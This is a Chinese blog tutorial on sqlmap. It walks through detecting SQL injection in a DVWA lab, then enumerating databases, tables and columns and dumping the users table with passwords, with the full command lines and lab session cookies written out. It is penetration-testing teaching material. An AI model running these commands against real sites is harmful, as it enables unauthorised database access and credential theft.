【学习笔记】新手5分钟快速体验SQLmap

最新推荐文章于 2019-11-01 17:01:06 发布
最新推荐文章于 2019-11-01 17:01:06 发布
阅读量280 收藏
点赞数
分类专栏: 学习笔记 安全工具 文章标签: sqlmap 注入 用法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/secur17y/article/details/93338075
版权

本文不对繁杂的引言、细节做介绍,直接进入操作过程。更多细节可以参考sqlmap详解

说明:进行实践操作之前,假设你已经搭建好了一套DVWA或其他测试环境。

测试平台:Kali Linux操作系统

测试目标:OWASP BWA平台中的DVWA 的SQL Injection

用到工具:Tamper Data

浏览器:Firefox

下面列出体验将用到的参数、选项说明

测试中用到的参数
-u指定要进行注入的URL
--dbs枚举数据库管理系统所有数据库
-D指定要进行枚举的数据库名(一般在--dbs得到之后)
--tables枚举指定数据库(有-D选项)的所有表
-T指定要进行枚举的表名(--tables之后)
--columns枚举指定表名的列
--dump转储注入返回的信息
cookie注入页面的cookie
-C指定要枚举的列字段名

以具体操作具体化上表的具体作用。

1、检测页面是否存在注入漏洞。

在Firefox浏览器的Tools菜单栏中打开Tamper data,我们在USER ID处随意输入一个值“aa”,Tamper data捕获HTTP有关信息,我们只要cookie值,右键复制。

在终端输入一下指令:

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31'

执行中可能会有让你选择[Y/n]的过程,最终会得到下面关键信息

即该URL中的id参数存在SQL注入点,分别为基于错误的注入点和Union查询的注入点,还给出了数据库版本及Web平台信息。

2、进一步探测数据库名称。

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' --dbs

也就是加上了--dbs参数,探测到如下信息

除了MySQL默认的系统数据库,还有一个名为dvwa的数据库。

3、看看有些什么表

-D参数来指定dvwa数据库,--tables选项进行表枚举。

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables

枚举出表名:[guestbook]和[users],当然是对users的内容更感兴趣。

4、进一步查看users表的字段列表

上一步的基础上使用-T参数指定表名,--columns选项对列表进行枚举

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables -T users --columns

得到表的字段名及数据类型

5、各个字段都是什么内容

使用--dump选项转储字段内容并保存,

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables -T users --columns --dump

达到目标

最终通过SQL注入得到了指定表的各字段具体信息,虽然password字段会被加密,但是在指令执行过程中会询问是否解密。

也许并非所有字段我们都想要,那么可以通过-C选项指定我们想要的列,比如这里我们只要user和password

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables -T users --columns  -C user,password--dump

这样就筛选出了我们感兴趣的字段内容。

再补充一点就是dvwa平台如果security等级被设置为high的话,直接sql探测会检测不到存在注入点。

Secur17y
关注
专栏目录
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP 的使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
sqlmap入门使用教程
talentac的博客
02-21 1539
sqlmap简单使用教程
sqlmap 新手入门
ynm0000的博客
06-16 339
1:扫描目标站点 python sqlmap.py -u "url" 例子:python sqlmap.py -u "http://textphp.vulnweb.com/artists.php?artist=1" 2:查看他的所有用户名:python sqlmap.py -u "http://textphp.vulnweb.com/artists.php?artist=1" --users ...
IDEA配置SqlMapConfig模板
qq_28864749的博客
11-01 974
1、file—setting,左上角输入template 2、在左侧栏找到File And Code Templates 3、中间选中Files 4、点击+号,添加模板 5、输入模板名字:Name:mybatis-cfg.xml (name可以自定义) 6、后缀名extension:xml 7、在面板中间输入内容: <?xml version="1.0" encoding="ut...
sqlmap新手注入
weixin_30687811的博客
12-04 251
一 什么是sqlmap    1 sqlmap is an open source penetration testing tool that automates the 2 process of detecting and exploiting SQL injection flaws and taking over of 3 database servers. It comes wit...
sqlmap笔记.md
08-18
sqlmap笔记
图集:快速SQLMap篡改建议程序
01-30
Atlas-快速SQLMap篡改建议v1.0 Atlas是一个开放源代码工具,可以建议sqlmap篡改绕过WAF / IDS / IPS,该工具基于返回的状态代码。 屏幕 安装 $ git clone https://github.com/m4ll0k/Atlas.git atlas $ cd atlas $ ...
sqlmap使用笔记1
08-03
本篇笔记将深入探讨sqlmap的使用方法和功能,涵盖多个核心知识点。 1. **数据库版本探测**: 使用`-b`选项可以获取数据库版本信息,这对于识别潜在的漏洞和制定攻击策略至关重要。例如,针对不同的数据库版本,...
sqlmap最全笔记及实验过程
04-25
sqlmap使用秘籍笔记大全 sqlmap是开源的自动化SQL注入工具,旨在检测和利用SQL注入漏洞。下面是sqlmap的详细使用秘籍笔记大全。 版本查看 Sqlmap --version:查看sqlmap的版本信息。 Sqlmap使用秘籍 Sqlmap支持...
Linux应用之sed删除空行
Secur17y的博客
09-16 3509
文章目录一、sed编辑器介绍二、sed删除空白行1. 删除连续的空白行2. 删除开头的空白行3. 删除结尾的空白行4. 删除HTML标签 一、sed编辑器介绍 sed编辑器被称作流编辑器(stream editor),和普通的交互式文本编辑器恰好相反。在交互式文本编辑器中(比如vim),你可以用键盘命令来交互式插入、删除或替换数据中的文本。流编辑器则会在编辑器处理数据之前基于预先提供的一组规则来编...
开启了Apache服务器,写的php内容却不能正常显示
Secur17y的博客
04-11 3307
今天要做个小小的测试,于是在虚拟机上打开Apache服务,但发现运行php文件的时候网页显示的却是我的代码(还只是部分),这让我对自己产生了怀疑:我肯定写错了。于是赶紧去翻翻数,看看基础部分。说来运气也好,以下就从书中找到了问题原因:修改过后立马正常!虽然是小问题,但还真的没注意到(当然是对我这样的初学者而言),给自己做个笔记!...
Kali Linux下载了公钥依然提示没有公钥
Secur17y的博客
04-15 3283
    Kali Linux如果太久没有使用就会导致密钥过期问题,这会引起无法更新的现象,此时需要更新密钥,关于如何更新已有很多博主介绍过。相信会有一些人看了虽然能照着操作,但不知道为什么。这其实是官方给的对你多下载的系统的安全性、完整性的一个验证操作。具体可见https://www.kali.org/downloads/中Download Kali Linux Images Securely部分...
Ubuntu 18.04 下安装ns-allinone-2.35
Secur17y的博客
07-30 2574
由于最近想要再搞搞网络仿真实验,需要在Ubuntu上使用NS2网络仿真器,本以为只需要Download+install就能ok。谁知道问题贼多。 大多数提及问题解决的都说道ease()改为this-&gt;ease(),由于先看过不少内容,这个在安装前就改了,所以也没出现这个问题。 实际上最头疼的是你./install等了好几分钟后得到结果是Ns make failed,是由于ns_2.35/...
gnuplot 脚本传递参数
Secur17y的博客
05-14 1170
在使用gnuplot工具绘图想要传递参数的方法 在官方文档中明确了作为参数的字符变量集合: ARG0,ARG1,...,ARG9 其中ARG0表示脚本名称,其余为传入的参数值;还有一个整数变量ARGC记录传入参数的个数。 文档中指出,可以传递参数的命令为call,它与load命令相似(load不能传递参数),如果已经进入gnuplot,则使用命令: call "input_scrip...
memcpy与memmove函数
Secur17y的博客
09-25 694
memcpy()与memmove()是C语言中的函数,其声明在头文件string.h中,具体声明如下: void* __cdecl memcpy( _Out_writes_bytes_all_(_Size) void* _Dst, _In_reads_bytes_(_Size) void const* _Src, _In_ ...
关于LeetCode中螺旋矩阵 III代码的解析
Secur17y的博客
09-11 582
太久没有编码了,逻辑思维跟不上节奏,阅读别人的代码也费了老半天的劲儿。题目原文在这里。 简要概括题目要求就是输出从方形矩阵中任意位置出发,螺旋遍历矩阵位置并按顺序输出。下面是别人的Python代码: class Solution(object): def spiralMatrixIII(self, R, C, r0, c0): ans = [(r0, c0)] ...
学习笔记】SQL盲注之dvwa平台的python自动化测试
Secur17y的博客
10-11 486
目的 理解SQL盲注的原理、方法、过程。利用不同数据库特有的函数进行探测,从而获取信息。 环境 系统:Kali Linux 2019(IP:10.10.10.128) 平台:OWASPBWA v0.94中的DVWA(IP:10.10.10.131) 界面 操作 现在想利用substr函数对数据库名进行猜解,将字符转化为ACSII值逐位比较。 语法 substr(strings,offset,le...
Ubuntu16.04下NS-2的一个小问题
Secur17y的博客
05-14 403
ns正确安装后,运行simple.tcl是可能出现nam: Can't finda usable tk.tcl in the following directories:    /home/byf/ns-allinone-2.35/tcl8.5.10/library/tk8.5/home/byf/ns-allinone-2.35/tcl8.5.10/tk8.5 ./lib/tk8.5/home/b...
学习笔记】Linux下使用NC传送文件
Secur17y的博客
10-14 353
Netcat亦即nc,众所周知,它被誉为TCP/IP的瑞士军刀。在其被用于文件传输中,网上搜到大部分资料都是使用-l选项监听后面直接跟端口号,即 nc -l 6666 > recvfile 但是实际操作中,在发送端发送时,即执行 nc dst.ip 6666 < sendfile 却被提示错误。 整个过程似乎都跟网上大家给的教程一致。也许是环境不同的原因,但是在我的测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值